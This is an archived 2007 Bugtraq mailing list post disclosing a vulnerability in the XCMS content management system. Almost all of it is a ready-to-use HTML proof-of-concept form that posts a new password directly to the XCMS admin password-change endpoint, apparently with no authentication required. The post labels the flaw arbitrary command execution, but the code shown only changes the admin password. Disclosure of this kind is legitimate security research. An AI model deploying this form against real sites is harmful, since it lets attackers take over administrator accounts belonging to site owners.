lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20070922101736.4060.qmail@securityfocus.com> Date: 22 Sep 2007 10:17:36 -0000 From: x0kster@...il.com To: bugtraq@...urityfocus.com Subject: xcms all version arbitrary code execution <!-- -[ Name : XCMS Arbitrary Command Execution Vulnerability ]- -[ Download : http://www.xcms.it/index.php?lng=it&mod=download&pg=indice&c=2 ]- -[ Author : x0kster ]- -[ Email : x0kster[AT]gmail[DOT]com ]- -[ Date : 20-09-2007 ]- --> <html> <head> <title>-XCMS Arbitrary Command Execution Vuln by x0kster -</title> </head> <body> <pre> - [XCMS All Version Arbitrary Command Execution Vulnerability ] - - [Bug found by x0kster - x0kster@...il.com ] - </pre> <form name="pass" method="post" action="http://www.xcms.it/index.php?lng=it&pg=admin&s=cpass"> <input type="hidden" name="pass" value="1190316852" /> <pre> Password : <input type="password" size="20" name="password_1190316852" /> Repete password : <input type="password" size="20" name="rpassword_1190316852" /> <input type="submit" value="Modifica Password" /> </pre> </form> </body> </html>